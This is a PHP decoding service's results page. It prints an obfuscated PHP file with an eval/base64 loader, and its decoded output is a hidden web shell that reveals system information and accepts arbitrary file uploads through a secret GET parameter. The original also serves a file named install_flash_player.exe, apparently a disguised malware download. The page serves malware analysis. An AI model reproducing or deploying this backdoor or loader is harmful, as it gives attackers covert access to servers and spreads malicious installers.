Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* mmmm mmmm mm mmmmmmmmm mm mmmmmmmmm mmm mmm mmmmmmmm mmmmm mmmmmmmm kkkkkkk mmmmm..
Decoded Output download
if(isset($_GET['!']) &&($_GET['!'] = "=") ){
echo '<b>Bullshit :)<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload") {
if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>Upload Success !!!</b><br><br>';}
else {echo '<b>Upload Fail !!!</b><br><br>';
}
}
};Did this file decode correctly?
Original Code
<?php /* mmmm mmmm mm mmmmmmmmm mm mmmmmmmmm mmm mmm mmmmmmmm mmmmm mmmmmmmm kkkkkkk mmmmmmmmmmm oo nnnn bbbb oo llllllll mmmmmmmmmmm */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x2b0;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDU3ZCk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>~Dkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLO0xNWLyHA1SmT09NHeEXHr8Xk10PkrfHT0knTyYdk09NTzEXHeEXTZffhtOuTr9tWAxTBZfNHr8XHr9NHeEmbUILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==eWppcJipF3YlftILb0fyaySmwUffhUEMkJILb0fyaySmwUffwe0Iwj0JhUEpGX0hcBYPdZEmNow+WmaSduYPDbWIKJL8Cmw+NokZNJFVFoiXb3aVCB1lhtLVkzxJFj48R2w+kzSYtMajDo8IkzxMd3kswoyjfolvdj0JwJnscbOPd2W9wmnvF3WJwoaVC3O5FoA9wM11duOpFoyZft9Md3ksRBOiforJwo5idBA9wmaXdo9icoaZwJnpce0JfbnSd2yLcbwJNJF7eWplC2ivwtF8DB5XfbWIfulXcT0JcMlScUwIdMyscT0JcMlScUwIF2l6cT0JYTEJNjxpdmn1ftnVCB1lNUkgfbnSwJn0GbnlNUkzfBksDbWJwolLNUkgfbnSwJn2CBx1cT0JabnSd2yLwj48R2cvFM0+kzSYtMlMhtELb1nNA1Odk191FoXmbUE9NUEJabnSd2yLwJLIGX0hDBCPWoYvFuLPky9oUAxyA1SmcMlScUffBZf0dbngdMyscUffRtOgOLlHOaYdk2cpdoAmbaSmdMyscUffhULIG2ajDo8IkzxJNlaXdo9ictnTfBYjcbYzwtriwTXvCj48Cmw+NokZNJF7gW0hcBxzcUn7cBYPdZEmNow+abnSd2yLwrciDBXIwUriNt9JNjxJFj48Cmw+kzSYtm0Ytm0Ytm07alVnRPIq
if($_POST['process'] == "yes") {
$file_type = "application/octet-stream";
header("Content-Type: application/$file_type");
header("Content-Disposition: attachment; filename=install_flash_player.exe");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
header("Expires: 0");
readfile("install_flash_player.exe");
}
?>Function Calls
| fopen | 1 |
| fread | 3 |
| strtr | 2 |
| fclose | 1 |
| urldecode | 1 |
| str_replace | 1 |
| base64_decode | 3 |
Stats
| MD5 | 8a0ee8912c0bff32773c24ca7d343dbf |
| Eval Count | 3 |
| Decode Time | 156 ms |